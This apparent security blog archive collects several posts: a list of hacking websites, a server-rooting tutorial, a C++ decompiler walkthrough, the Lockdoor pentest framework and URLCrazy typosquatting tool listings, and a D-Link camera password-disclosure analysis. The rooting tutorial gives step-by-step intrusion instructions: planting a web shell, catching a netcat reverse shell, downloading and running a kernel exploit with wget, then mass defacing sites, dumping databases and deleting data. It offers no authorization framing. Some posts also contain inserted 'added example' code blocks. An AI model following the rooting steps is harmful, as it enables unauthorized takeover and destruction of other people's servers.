- Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
- The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
- Black Hat: The Black Hat Briefings have become the biggest and the most important security conference series in the world by sticking to our core value: serving the information security community by delivering timely, actionable security information in a friendly, vendor-neutral environment.
- Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
- Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the world's best penetration testing software now.
- KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
- Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
- SecurityFocus: Provides security information to all members of the security community, from end users, security hobbyists and network administrators to security consultants, IT Managers, CIOs and CSOs.
- DEFCON: Information about the largest annual hacker convention in the US, including past speeches, video, archives, and updates on the next upcoming show as well as links and other details.
- SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
- Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
- Phrack Magazine: Digital hacking magazine.
- HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
- NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
Tuesday, June 30, 2020
Ethical hacking: Top 14 best websites to learn hacking
Friday, June 12, 2020
HOW TO ROOT A SERVER? – SERVER ROOTING
Servers serve the requests users make to web pages; think of them as the waiter who brings the meal you ordered. Here I am sharing how to root a server. Root is the administrator account of the whole server. Anyone who gets root access can do anything on it: delete or copy anything on the server, or deface every website it hosts (a mass deface).
Root is a Linux/Unix concept; Windows has its own equivalent (Administrator/SYSTEM), which is out of scope here. That is enough for a beginner, because a full treatment of root would need another book. So now we know why root access matters and why we try to get it.
HOW TO ROOT A SERVER?
There are 3 ways to get root on a server:
1 – With a local root exploit.
2 – With SQL injection, by reading sensitive files on the server that contain the root password.
3 – With an exploit against a piece of installed software (e.g. a buffer overflow).
In this post, we will explain local root. I will explain the other ways in another post.
OK, let's get back to work.
After uploading your shell to the server and finding a local root exploit, you open a back connect (reverse shell) and run the local root exploit to get root. That is the general idea; in the next steps you will see how to find a local root and run it to get root access.
HOW TO SEARCH FOR A LOCAL ROOT?
First of all, you need to know the kernel version.
You can see it in your web shell's header; for example, this one shows 2.6.18 – 2012.
Or go to EXECUTE in your shell and run "uname -a". You will get the same result.
Now, how to find the local root.
You can use various websites such as Exploit-DB, packetstormsecurity, vfocus, injector, etc., which provide these local roots. One more thing to notice: there are two types of local roots:
1. local.c: source code that still has to be compiled for the target.
2. local: a compiled binary, ready to use.
HOW TO GET ROOT ACCESS?
First, you need a shell with a Back Connect option like this:
Enter your public IP address in SERVER and the port you want to connect on, leave the method as Perl this time, and finally click connect.
You receive the back connect with a tool named netcat, which you can download from the net. Then open your terminal if you are on Linux, or CMD if you are on Windows. I will explain only Linux; for Windows it is all the same.
After that, follow these steps (step 1 runs on your own machine, steps 2–8 run inside the reverse shell on the server):
1 – nc -vlp 433 (listen on the same port you entered in the back connect form)
2 – wget [the link of the local-Root.zip]
3 – unzip local-Root.zip
4 – chmod 777 local.c
5 – compile local.c into the local binary: gcc local.c -o local. You will find local.c transformed into local.
6 – chmod 777 local
7 – ./local to run the local root exploit (a kernel exploit that does not match the running kernel can crash the server, so make sure the version matches before running it)
8 – su
Then check your id: uid=0(root) gid=0(root) groups=0(root)
Getting uid=0 means you have root privileges and can do a variety of things on the remote server: mass deface, dump databases, redirect sites, change content, etc.
AFTER THE ROOT
Once the server is rooted, you can do the many things I mentioned above, such as removing domains, mass defacing, and deleting the data completely.
Thursday, June 11, 2020
Reversing Some C++ Io Operations
In general, decompilers are not friendly with C++, so let's analyse a simple program to get familiar with their output.
Let's implement a simple program that loads a file into a vector and then saves the vector, with the following functions:
- err
- load
- save
- main
Let's identify the typical way in C++ to print to stdout with the operator "<<".
The basic_ostream is initialized by writing the word "error" to cout, and then operator<< is called again to add the endl.
The main function simply calls "vec = load(filename)", but the compiler changed the call and passed a pointer to the vector's storage as a hidden parameter (the return slot). Then it builds and prints "loaded " << size << " users".
And finally it saves the vector to /tmp/pwd and prints "saved".
Most of the mess is basically the operator "<<" used to concatenate and print values.
Also note that the vectors and strings are automatically deallocated (their destructors run) when the function exits.
And here is the code:
Let's take a look at the load function, which iterates ifs.getline() and pushes each line to the vector.
First of all, there is a mess in the function definition: __return_storage_ptr is the vector.
The ifstream object ifs is initialized as a basic_ifstream, and then operator! checks whether the file could not be opened, in which case err() is called.
We see the memset and a loop: getline reads a C-string-like line from the file, which is then converted to a string before being pushed to the vector. lVar1 is the stack canary value.
In this situation, don't get confused by the vector pointer vec initialization at the beginning; in this case the logic is quite clear.
The save function is a bit more tricky, but it's no more than a vector iteration and ofs writing.
Looping a simple "for (auto s : *vec)" in the decompiler is quite dense, but we can clearly see two writes; the second write, DAT_0010400b, is a "\n".
As we see, the save implementation is quite straightforward.
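The post's own listing is a screenshot that did not survive extraction. The following is an added reconstruction, not the post's original code, of the four functions it reverses (err, load, save, main), written so you can compile it and compare the binary against the decompiler output: getline into a fixed C buffer, conversion to std::string before push_back, operator! on the ifstream guarding err(), and two write calls per line in save. The /tmp/pwd output path and the "loaded ... users" / "saved" messages follow the post; the 256-byte line buffer and the exact error text are assumptions.

```cpp
// Added example, not the post's original listing: reconstruction of err/load/save/main.
// Assumptions: 256-byte line buffer, error message text. /tmp/pwd and the printed
// messages are taken from the post.
#include <cstdlib>
#include <cstring>
#include <fstream>
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

// Two operator<< calls on cout, the pattern the decompiler shows for err().
static void err(const char *msg) {
    std::cout << "error: " << msg << std::endl;
    std::exit(1);
}

// getline() fills a fixed C buffer (hence the memset the decompiler shows) and each
// line is converted to std::string before push_back. A line longer than the buffer
// sets failbit and ends the loop, so the buffer size is a hard limit here.
static std::vector<std::string> load_lines(std::istream &in) {
    std::vector<std::string> vec;
    char line[256];
    std::memset(line, 0, sizeof line);
    while (in.getline(line, sizeof line)) {
        vec.push_back(std::string(line));
        std::memset(line, 0, sizeof line);
    }
    return vec;
}

// operator! on the ifstream is what guards the call to err() in the decompiled load.
static std::vector<std::string> load(const std::string &filename) {
    std::ifstream ifs(filename);
    if (!ifs) err("cannot open input file");
    return load_lines(ifs);
}

// One write for the string bytes and one for "\n": the two write calls visible in save.
static void save_lines(const std::vector<std::string> &vec, std::ostream &out) {
    for (auto s : vec) {
        out.write(s.data(), static_cast<std::streamsize>(s.size()));
        out.write("\n", 1);
    }
}

static void save(const std::vector<std::string> &vec, const std::string &filename) {
    std::ofstream ofs(filename);
    if (!ofs) err("cannot open output file");
    save_lines(vec, ofs);
}

// Round trip through in-memory streams: what save() would write for a given input.
static std::string roundtrip_text(const std::string &text) {
    std::istringstream in(text);
    std::ostringstream out;
    save_lines(load_lines(in), out);
    return out.str();
}

// Number of lines load() would push for a given input.
static std::size_t roundtrip_count(const std::string &text) {
    std::istringstream in(text);
    return load_lines(in).size();
}

int main(int argc, char **argv) {
    if (argc != 2) err("usage: loadsave <file>");
    std::vector<std::string> vec = load(argv[1]);
    std::cout << "loaded " << vec.size() << " users" << std::endl;
    save(vec, "/tmp/pwd");
    std::cout << "saved" << std::endl;
    return 0;
}
```

Build it with `g++ -O1 -o loadsave loadsave.cpp` and open the binary in the decompiler; the hidden return-slot parameter on load, the memset/getline loop and the two writes in save should all be recognisable against the description above. A final line without a trailing newline is still loaded, because getline only sets failbit when it extracts nothing.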
More information
Lockdoor-Framework: A PenTesting Framework With Cyber Security Resources
About Lockdoor-Framework
Author: SofianeHamlaoui
- Github: SofianeHamlaoui
- Twitter: S0fianeHamlaoui
- Facebook: S0fianeHamlaoui
LockDoor is a framework aimed at helping penetration testers, bug bounty hunters and cyber security engineers. It is designed for Debian/Ubuntu/Arch Linux based distributions, to turn them into a familiar penetration-testing environment containing the tools pentesters use most. Most of us pentesters have a personal '/pentest/' directory, and this framework helps you build a well-organized one. On top of that, it automates parts of the pentesting process to help you do the job more quickly and easily.
Lockdoor-Framework installation:
For now, Lockdoor-Framework supports Debian-based Linux distros (Kali Linux, ParrotSec, Ubuntu...), Arch Linux based distros (Manjaro, BlackArch, ArchStrike...), Fedora, OpenSuse, Cygwin on Windows.
Open your Terminal and enter these commands:
You can watch detail here:
Lockdoor Tools contents 🛠️:
* Information Gathering 🔎:
- dirsearch: A Web path scanner
- brut3k1t: security-oriented bruteforce framework
- gobuster: DNS and VHost busting tool written in Go
- Enyx: an SNMP IPv6 Enumeration Tool
- Goohak: Launches Google Hacking Queries Against A Target Domain
- Nasnum: The NAS Enumerator
- Sublist3r: Fast subdomains enumeration tool for penetration testers
- wafw00f: identify and fingerprint Web Application Firewall
- Photon: Incredibly fast crawler designed for OSINT.
- Raccoon: offensive security tool for reconnaissance and vulnerability scanning
- DnsRecon: DNS Enumeration Script
- Nmap: The famous security Scanner, Port Scanner, & Network Exploration Tool
- sherlock: Find usernames across social networks
- snmpwn: An SNMPv3 User Enumerator and Attack tool
- Striker: an offensive information and vulnerability scanner.
- theHarvester: E-mails, subdomains and names Harvester
- URLextractor: Information gathering & website reconnaissance
- denumerator.py: Enumerates list of subdomains
- other: other information gathering, recon and enumeration scripts I collected somewhere.
- ReconDog: Reconnaissance Swiss Army Knife
- RED_HAWK: All in one tool for Information Gathering, Vulnerability Scanning and Crawling
- Dracnmap: Info Gathering Framework
* Web Hacking 🌐:
- Spaghetti: Web Application Security Scanner
- CMSmap: CMS scanner
- BruteXSS: BruteXSS is a tool to find XSS vulnerabilities in web application
- J-dorker: Website List grabber from Bing
- droopescan: scanner to identify CMSs (Drupal, Silverstripe)
- Optiva: Web Application Scanner
- V3n0M: Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
- AtScan: Advanced dork Search & Mass Exploit Scanner
- WPSeku: Wordpress Security Scanner
- WPScan: A simple Wordpress scanner written in python
- XSStrike: Most advanced XSS scanner.
- SQLMap: automatic SQL injection and database takeover tool
- WhatWeb: the Next generation web scanner
- joomscan: Joomla Vulnerability Scanner Project
- Dzjecter: Server checking Tool
* Privilege Escalation ⚠️:
- Linux 🐧: linux_checksec.sh, linux_enum.sh, linux_gather_files.sh, linux_kernel_exploiter.pl, linux_privesc.py, linux_privesc.sh, linux_security_test, Linux_exploits folder
- Windows: windows-privesc-check.py, windows-privesc-check.exe
- MySql: raptor_udf.c, raptor_udf2.c
* Reverse Engineering ⚡:
- Radare2: unix-like reverse engineering framework
- VirusTotal: VirusTotal tools
- Miasm: Reverse engineering framework
- Mirror: reverses the bytes of a file
- DnSpy: .NET debugger and assembly editor
- AngrIo: A python framework for analyzing binaries (Suggested by @Hamz-a)
- DLLRunner: a smart DLL execution script for malware analysis in sandbox systems.
- Fuzzy Server: a program that uses pre-made SPIKE scripts to attack VulnServer.
- yara: a tool aimed at helping malware researchers to identify and classify malware samples
- Spike: a protocol fuzzer creation kit + audits
- other: other scripts collected somewhere
* Exploitation ❗:
- Findsploit: Find exploits in local and online databases instantly
- Pompem: Exploit and Vulnerability Finder
- rfix: Python tool that helps RFI exploitation.
- InUrlBr: Advanced search in search engines
- Burpsuite: Burp Suite for security testing & scanning.
- linux-exploit-suggester2: Next-Generation Linux Kernel Exploit Suggester
- other: other scripts I collected somewhere.
* Shells 🐚:
- WebShells: BlackArch's Webshells Collection
- ShellSum: A defense tool - detect web shells in local directories
- Weevely: Weaponized web shell
- python-pty-shells: Python PTY backdoors
* Password Attacks ✳️:
- crunch : a wordlist generator
- CeWL : a Custom Word List Generator
- patator : a multi-purpose brute-forcer, with a modular design and a flexible usage
- Codetective: a tool to determine the crypto/encoding algorithm used
- findmyhash: Python script to crack hashes using online services
* Social Engineering 🎭:
- scythe: an accounts enumerator
Contributing:
- Fork Lockdoor-Framework:
git clone https://github.com/SofianeHamlaoui/Lockdoor-Framework.git
- Create your feature branch
- Commit your changes
- Push to the branch
- Create a new Pull Request
Features 📙:
- Pentesting tools selection: the tools Lockdoor contains are a collection of the best tools on Kali Linux, ParrotSec and BlackArch, plus some private tools from other hacking teams like InurlBr and iran-cyber, and some cool tools found on GitHub.
- Easy customization: easily add/remove tools.
- Installation: you can install the tool automatically using install.sh, manually, or on Docker [COMING SOON].
- Resources and cheatsheets: everyone can forget a step of a process, how to use a tool, or some trick. That is where the cheatsheets come in: there are cheatsheets about every tool in the framework and about enumeration, exploitation and post-exploitation techniques.
Check the Wiki pages to know more about the tool 📙:
Lockdoor-Framework's screenshots:
- First Step
- Lockdoor update
- ROOT Menu
- Information Gathering
- Web Hacking
- Exploitation
- Reverse Engineering
- Enc/Dec
- Password Attacks
- Shells
- PrivEsc
- Social Engineering
- PSAFRT
- Walkthroughs
- About
Support the author:
On Paypal: Sofiane Hamlaoui
Wednesday, June 10, 2020
URLCrazy - Generate And Test Domain Typos And Variations To Detect And Perform Typo Squatting, URL Hijacking, Phishing, And Corporate Espionage
URLCrazy is an OSINT tool to generate and test domain typos or variations to detect or perform typo squatting, URL hijacking, phishing, and corporate espionage.
Homepage: https://www.morningstarsecurity.com/research/urlcrazy
Use Cases
- Detect typo squatters profiting from typos on your domain name
- Protect your brand by registering popular typos
- Identify typo domain names that will receive traffic intended for another domain
- Conduct phishing attacks during a penetration test
Features
- Generates 15 types of domain variants
- Knows over 8000 common misspellings
- Supports bit flipping attacks
- Multiple keyboard layouts (qwerty, azerty, qwertz, dvorak)
- Checks if a domain variant is valid
- Test if domain variants are in use
- Estimate popularity of a domain variant
Installation
Install from a package manager
If you are using Kali Linux, Ubuntu or Debian use:
$ sudo apt install urlcrazy
Install latest release
Visit https://github.com/urbanadventurer/urlcrazy/releases
Install current development version
Be aware the latest development version may not be stable.
$ git clone https://github.com/urbanadventurer/urlcrazy.git
Install Ruby
URLCrazy has been tested with Ruby versions 2.4 and 2.6.
If you are using Ubuntu or Debian use:
$ sudo apt install ruby
Install Bundler
Bundler provides dependency management for Ruby projects
$ gem install bundler
Install Dependencies
$ bundle install
Alternatively, if you don't want to install bundler, the following command will install the gem dependencies.
$ gem install json colorize async async-dns async-http
Usage
Simple Usage
With default options, URLCrazy will check over 2000 typo variants for google.com.
$ urlcrazy google.com
With popularity estimate
$ urlcrazy -p domain.com
Commandline Usage
Usage: ./urlcrazy [options] domain
Options
-k, --keyboard=LAYOUT Options are: qwerty, azerty, qwertz, dvorak (default: qwerty)
-p, --popularity Check domain popularity with Google
-r, --no-resolve Do not resolve DNS
-i, --show-invalid Show invalid domain names
-f, --format=TYPE Human readable or CSV (default: human readable)
-o, --output=FILE Output file
-n, --nocolor Disable colour
-h, --help This help
-v, --version Print version information. This version is 0.7
Types of Domain Variations Supported
Character Omission
These typos are created by leaving out a letter of the domain name, one letter at a time. For example, www.goole.com and www.gogle.com
Character Repeat
These typos are created by repeating a letter of the domain name. For example, www.ggoogle.com and www.gooogle.com
Adjacent Character Swap
These typos are created by swapping the order of adjacent letters in the domain name. For example, www.googel.com and www.ogogle.com
Adjacent Character Replacement
These typos are created by replacing each letter of the domain name with letters to the immediate left and right on the keyboard. For example, www.googke.com and www.goohle.com
Double Character Replacement
These typos are created by replacing identical, consecutive letters of the domain name with letters to the immediate left and right on the keyboard. For example, www.gppgle.com and www.giigle.com
Adjacent Character Insertion
These typos are created by inserting letters to the immediate left and right on the keyboard of each letter. For example, www.googhle.com and www.goopgle.com
Missing Dot
These typos are created by omitting a dot from the domain name. For example, wwwgoogle.com and www.googlecom
Strip Dashes
These typos are created by omitting a dash from the domain name. For example, www.domain-name.com becomes www.domainname.com
Singular or Pluralise
These typos are created by making a singular domain plural and vice versa. For example, www.google.com becomes www.googles.com and www.games.co.nz becomes www.game.co.nz
Common Misspellings
Over 8000 common misspellings from Wikipedia. For example, www.youtube.com becomes www.youtub.com and www.abseil.com becomes www.absail.com
Vowel Swapping
Swap vowels within the domain name except for the first letter. For example, www.google.com becomes www.gaagle.com.
Homophones
Over 450 sets of words that sound the same when spoken. For example, www.base.com becomes www.bass.com.
Bit Flipping
Each letter in a domain name is an 8-bit character. The character is substituted with the set of valid characters that can be made after a single bit flip. For example, facebook.com becomes bacebook.com, dacebook.com, faaebook.com, fabebook.com, facabook.com, etc.
Homoglyphs
One or more characters that look similar to another character but are different are called homoglyphs. An example is that the lower case l looks similar to the numeral one, e.g. l vs 1. For example, google.com becomes goog1e.com.
Wrong Top Level Domain
For example, www.google.com becomes www.google.org. Uses the 19 most common top level domains.
Wrong Second Level Domain
Uses an alternate, valid second level domain for the top level domain. For example, www.trademe.co.nz becomes www.trademe.ac.nz and www.trademe.iwi.nz
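The variant types above are each a small string transformation. The block below is an added example, not URLCrazy's own code, that reimplements seven of them (character omission, repeat, adjacent swap, keyboard replacement and insertion, bit flipping, homoglyphs, plus the missing-dot case) so you can see exactly how each class of typo is produced and check the examples given above. The QWERTY left/right neighbour map and the homoglyph table are short subsets written for this example and are assumptions, not URLCrazy's data; the syntactic label check (1–63 characters, no leading or trailing dash) is also an assumption and is not the TLD/SLD validity check the tool performs.

```cpp
// Added example, not URLCrazy's code. kNeighbours and kHomoglyphs are assumed subsets.
#include <algorithm>
#include <map>
#include <set>
#include <string>
#include <vector>

using Vec = std::vector<std::string>;

// Keys immediately left and right of each letter on a QWERTY layout (assumed subset).
static const std::map<char, std::string> kNeighbours = {
    {'q', "w"},  {'w', "qe"}, {'e', "wr"}, {'r', "et"}, {'t', "ry"}, {'y', "tu"},
    {'u', "yi"}, {'i', "uo"}, {'o', "ip"}, {'p', "o"},  {'a', "s"},  {'s', "ad"},
    {'d', "sf"}, {'f', "dg"}, {'g', "fh"}, {'h', "gj"}, {'j', "hk"}, {'k', "jl"},
    {'l', "k"},  {'z', "x"},  {'x', "zc"}, {'c', "xv"}, {'v', "cb"}, {'b', "vn"},
    {'n', "bm"}, {'m', "n"}};
// Look-alike characters (assumed subset of a homoglyph list).
static const std::map<char, std::string> kHomoglyphs = {
    {'l', "1i"}, {'i', "l1"}, {'o', "0"}, {'g', "q"}, {'q', "g"}};

// Character Omission: drop one letter at a time.
static Vec omissions(const std::string &s) {
    Vec out;
    for (std::size_t i = 0; i < s.size(); ++i) out.push_back(s.substr(0, i) + s.substr(i + 1));
    return out;
}
// Character Repeat: double one letter at a time.
static Vec repeats(const std::string &s) {
    Vec out;
    for (std::size_t i = 0; i < s.size(); ++i) out.push_back(s.substr(0, i + 1) + s.substr(i));
    return out;
}
// Adjacent Character Swap: exchange each pair of neighbouring letters.
static Vec swaps(const std::string &s) {
    Vec out;
    for (std::size_t i = 0; i + 1 < s.size(); ++i) {
        std::string t = s;
        std::swap(t[i], t[i + 1]);
        out.push_back(t);
    }
    return out;
}
// Adjacent Character Replacement (insert=false) / Insertion (insert=true) using the keyboard map.
static Vec keyboard_variants(const std::string &s, bool insert) {
    Vec out;
    for (std::size_t i = 0; i < s.size(); ++i) {
        auto it = kNeighbours.find(s[i]);
        if (it == kNeighbours.end()) continue;
        for (char n : it->second) {
            if (insert) {
                out.push_back(s.substr(0, i) + n + s.substr(i));          // neighbour before the letter
                out.push_back(s.substr(0, i + 1) + n + s.substr(i + 1));  // neighbour after the letter
            } else {
                std::string t = s;
                t[i] = n;
                out.push_back(t);
            }
        }
    }
    return out;
}
static Vec replacements(const std::string &s) { return keyboard_variants(s, false); }
static Vec insertions(const std::string &s) { return keyboard_variants(s, true); }

// Bit Flipping: flip each of the 8 bits of every letter; keep only valid hostname characters.
static bool host_char(unsigned char c) {
    return (c >= 'a' && c <= 'z') || (c >= '0' && c <= '9') || c == '-';
}
static Vec bit_flips(const std::string &s) {
    Vec out;
    for (std::size_t i = 0; i < s.size(); ++i)
        for (int b = 0; b < 8; ++b) {
            unsigned char f = static_cast<unsigned char>(s[i]) ^ static_cast<unsigned char>(1u << b);
            if (!host_char(f)) continue;
            std::string t = s;
            t[i] = static_cast<char>(f);
            out.push_back(t);
        }
    return out;
}
// Homoglyphs: substitute look-alike characters.
static Vec homoglyphs(const std::string &s) {
    Vec out;
    for (std::size_t i = 0; i < s.size(); ++i) {
        auto it = kHomoglyphs.find(s[i]);
        if (it == kHomoglyphs.end()) continue;
        for (char h : it->second) { std::string t = s; t[i] = h; out.push_back(t); }
    }
    return out;
}
// Missing Dot: drop one dot of the full domain at a time.
static Vec missing_dots(const std::string &d) {
    Vec out;
    for (std::size_t i = 0; i < d.size(); ++i)
        if (d[i] == '.') out.push_back(d.substr(0, i) + d.substr(i + 1));
    return out;
}
// Syntactic label check (assumption): 1..63 chars, no leading or trailing '-'.
static bool valid_label(const std::string &l) {
    return !l.empty() && l.size() <= 63 && l.front() != '-' && l.back() != '-';
}
// Run every label-level generator on the first label, rejoin with the rest of the
// domain, drop invalid labels and the original, then add the missing-dot variants.
static std::set<std::string> variants(const std::string &domain) {
    std::size_t dot = domain.find('.');
    std::string label = domain.substr(0, dot);
    std::string rest = dot == std::string::npos ? "" : domain.substr(dot);
    Vec (*const gens[])(const std::string &) = {omissions, repeats, swaps, replacements,
                                                insertions, bit_flips, homoglyphs};
    std::set<std::string> out;
    for (auto gen : gens)
        for (const std::string &v : gen(label))
            if (valid_label(v) && v != label) out.insert(v + rest);
    for (const std::string &v : missing_dots(domain)) out.insert(v);
    return out;
}
static bool has(const Vec &v, const std::string &x) {
    return std::find(v.begin(), v.end(), x) != v.end();
}
```

The deduplication in variants() matters: "gogle" is produced twice by omission (either "o" can be dropped) and again by other generators, and in the tool every surviving variant costs a DNS lookup, so the set is what you want before resolving. Bit flipping is the one generator that is not a human typo at all: it models memory or transmission errors, which is why only flips that still yield a hostname character are kept.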
Supported Keyboard Layouts
Keyboard layouts supported are:
- QWERTY
- AZERTY
- QWERTZ
- DVORAK
Is the domain valid?
URLCrazy has a database of valid top level and second level domains. This information has been compiled from Wikipedia and domain registrars. We know whether a domain is valid by checking if it matches top level and second level domains. For example, www.trademe.co.bz is a valid domain in Belize which allows any second level domain registrations but www.trademe.xo.nz isn't because xo.nz isn't an allowed second level domain in New Zealand.
Popularity Estimate
URLCrazy pioneered the technique of estimating the relative popularity of a typo from search engine results data. By measuring how many times a typo appears in web pages, we can estimate how often users will make that typo when typing in a URL.
The inherent limitation of this technique is that a typo for one domain can be a legitimate domain in its own right. For example, googles.com is a typo of google.com, but it is also a legitimate domain.
For example, consider the following typos for google.com.
| Count | Typo |
|---|---|
| 25424 | gogle.com |
| 24031 | googel.com |
| 22490 | gooogle.com |
| 19172 | googles.com |
| 19148 | goole.com |
| 18855 | googl.com |
| 17842 | ggoogle.com |
Known Issues
macOS File Descriptor Limit
If DNS resolution fails under macOS, it could be due to the small default file descriptor limit.
To display the current file descriptor limit use:
$ ulimit -a
To increase the file descriptor limit use:
$ ulimit -n 10000
URLCrazy Appearances
Kali Linux
URLCrazy was a default tool in BackTrack 5, and later Kali Linux. https://tools.kali.org/information-gathering/urlcrazy
The Browser Hacker's Handbook
Authored by Wade Alcorn, Christian Frichot, and Michele Orru.
URLCrazy is included in Chapter 2 of this seminal work on the topic.
PTES Technical Guidelines
Penetration Testing Execution Standard (PTES) is a standard designed to provide a common language and scope for performing penetration testing (i.e. Security evaluations). URLCrazy is included in the Tools Required section.
http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
Network Security Toolkit
Network Security Toolkit is a bootable Linux distribution designed to provide easy access to best-of-breed Open Source Network Security Applications. https://www.networksecuritytoolkit.org/
See Also
URLCrazy was first published in 2009, and for many years was the most advanced opensource tool for studying typosquatting. Since then multiple other tools have been developed by the infosec community.
DNSTwist
DNSTwist is developed by Marcin Ulikowski and first published in 2015. DNSTwist had a significant feature overlap with URLCrazy at the time, and introduced many new features.
Language: Python
https://github.com/elceef/dnstwist
URLInsane
URLInsane was developed by Rangertaha in 2018 and claims to match the features of URLCrazy and DNSTwist.
Language: Go
https://github.com/cybint/urlinsane
DomainFuzz
DomainFuzz was developed by monkeym4ster in 2017. Language: Node.JS
https://github.com/monkeym4ster/DomainFuzz
Authors and Acknowledgement
- Authored by Andrew Horton (urbanadventurer).
- Thanks to Ruby on Rails for Inflector which allows plural and singular permutations.
- Thanks to Wikipedia for the set of common misspellings, homophones, and homoglyphs.
- Thanks to software77.net for their IP to country database
Community
If you have any questions, comments or concerns regarding URLCrazy, please consult the documentation prior to contacting one of the developers. Your feedback is always welcome.
via KitPloit
This article is the property of Tenochtitlan Offensive Security. Read the full article at --> https://tenochtitlan-sec.blogspot.com
Open Sesame (Dlink - CVE-2012-4046)
A couple of weeks ago a vulnerability was posted for the dlink DCS-9xx series of cameras. The author of the disclosure found that the setup application that comes with the camera is able to send a specifically crafted request to a camera on the same network and receive its password in plaintext. I figured this was a good chance to do some analysis, figure out exactly how the application carries out this functionality, and possibly write a script to pull the password out of a camera.
The basic functionality of the application is as follows:
- Application sends out a UDP broadcast on port 5978
- Camera sees the broadcast on port 5978 and inspects the payload – if it sees that the initial part of the payload contains "FF FF FF FF FF FF" it responds (UDP broadcast port 5978) with an encoded payload with its own MAC address
- Application retrieves the camera's response and creates another UDP broadcast but this time it sets the payload to contain the target camera's MAC address, this encoded value contains the command to send over the password
- Camera sees the broadcast on port 5978 and checks that it is meant for it by inspecting the MAC address that has been specified in the payload, it responds with an encoded payload that contains its password (base64 encoded)
After spending some time with the application in a debugger I found what looked like the routine responsible for decoding the encoded values that are passed. After spending some time documenting it I came up with the following notes (messy wall of text):
(Screenshot: super exciting screen shot.)
| Instruction | Comment |
|---|---|
| JGE SHORT 0A729D36 | stage1 |
| MOV EDX,DWORD PTR SS:[LOCAL.2] | set EDX to our 1st stage half-decoded buffer |
| MOV ECX,DWORD PTR SS:[LOCAL.4] | set ECX to our current count/offset |
| MOV EAX,DWORD PTR SS:[LOCAL.3] | set EAX to our base64 encoded payload |
| MOVSX EAX,BYTE PTR DS:[EAX] | set EAX to the current value in our base64 payload |
| MOV AL,BYTE PTR DS:[EAX+0A841934] | use that value as an offset into the lookup table at 0A841934 and load the table byte into AL |
| MOV BYTE PTR DS:[ECX+EDX],AL | ECX = offset, EDX = start of our half-decoded buffer; write our current byte there |
| INC DWORD PTR SS:[LOCAL.4] | increment our offset/count |
| INC DWORD PTR SS:[LOCAL.3] | advance our base64 buffer pointer to the next value |
| MOV EDX,DWORD PTR SS:[LOCAL.4] | set EDX to our counter |
| CMP EDX,DWORD PTR SS:[ARG.2] | compare EDX (counter) to our total size |
| JL SHORT 0A729D13 | jump back if we have not finished half-decoding our input value |
| MOV ECX,DWORD PTR SS:[ARG.3] | looks like this points at our decoded buffer |
| MOV DWORD PTR SS:[LOCAL.5],ECX | set LOCAL.5 to our decoded destination |
| MOV EAX,DWORD PTR SS:[LOCAL.2] | set EAX to our half-decoded buffer |
| MOV DWORD PTR SS:[LOCAL.3],EAX | set LOCAL.3 to point at our half-decoded buffer |
| MOV EDX,DWORD PTR SS:[ARG.4] | ???? 1500 decimal |
| XOR ECX,ECX | clear ECX |
| MOV DWORD PTR DS:[EDX],ECX | clear out the ARG.4 value |
| XOR EAX,EAX | clear out EAX |
| MOV DWORD PTR SS:[LOCAL.6],EAX | clear out LOCAL.6 |
| JMP SHORT 0A729DAE | jump |
| MOV EDX,DWORD PTR SS:[LOCAL.3] | move our current half-decoded dword position into EDX |
| MOV CL,BYTE PTR DS:[EDX] | move our current byte into ECX (CL) (dword[0]) |
| SHL ECX,2 | shift left 2 dword[0] |
| MOV EAX,DWORD PTR SS:[LOCAL.3] | move our current dword position into EAX |
| MOVSX EDX,BYTE PTR DS:[EAX+1] | move our current dword position + 1 (dword[1]) into EDX |
| SAR EDX,4 | shift right 4 dword[1] |
| ADD CL,DL | add (dword[0] << 2) + (dword[1] >> 4) |
| MOV EAX,DWORD PTR SS:[LOCAL.5] | set EAX to our current decoded buffer position |
| MOV BYTE PTR DS:[EAX],CL | write our decoded (dword[0]) value to our decoded buffer |
| INC DWORD PTR SS:[LOCAL.5] | increment our position in the decoded buffer |
| MOV EDX,DWORD PTR SS:[LOCAL.3] | set EDX to our current dword position |
| MOV CL,BYTE PTR DS:[EDX+1] | set ECX to dword[1] |
| SHL ECX,4 | shift left 4 dword[1] |
| MOV EAX,DWORD PTR SS:[LOCAL.3] | set EAX to our current dword position |
| MOVSX EDX,BYTE PTR DS:[EAX+2] | set EDX to dword[2] |
| SAR EDX,2 | shift right 2 dword[2] |
| ADD CL,DL | add (dword[1] << 4) + (dword[2] >> 2) |
| MOV EAX,DWORD PTR SS:[LOCAL.5] | set EAX to our next spot in the decoded buffer |
| MOV BYTE PTR DS:[EAX],CL | write our decoded value into our decoded buffer |
| INC DWORD PTR SS:[LOCAL.5] | move to the next spot in our decoded buffer |
| MOV EDX,DWORD PTR SS:[LOCAL.3] | set EDX to our current half-decoded dword |
| MOV CL,BYTE PTR DS:[EDX+2] | set ECX to dword[2] |
| SHL ECX,6 | shift left 6 dword[2] |
| MOV EAX,DWORD PTR SS:[LOCAL.3] | set EAX to our current half-decoded dword |
| ADD CL,BYTE PTR DS:[EAX+3] | add (dword[2] << 6) + dword[3] |
| MOV EDX,DWORD PTR SS:[LOCAL.5] | set EDX to point at our next spot in our decoded buffer |
| MOV BYTE PTR DS:[EDX],CL | write our decoded byte to our decoded buffer |
| INC DWORD PTR SS:[LOCAL.5] | move to the next spot in our decoded buffer |
| ADD DWORD PTR SS:[LOCAL.3],4 | advance our encoded buffer pointer to the next dword |
| MOV ECX,DWORD PTR SS:[ARG.4] | set ECX to our current offset? |
| ADD DWORD PTR DS:[ECX],3 | add 3 to our current offset? |
| ADD DWORD PTR SS:[LOCAL.6],4 | add 4 to our byte counter? |
| MOV EAX,DWORD PTR SS:[ARG.2] | move total size into EAX |
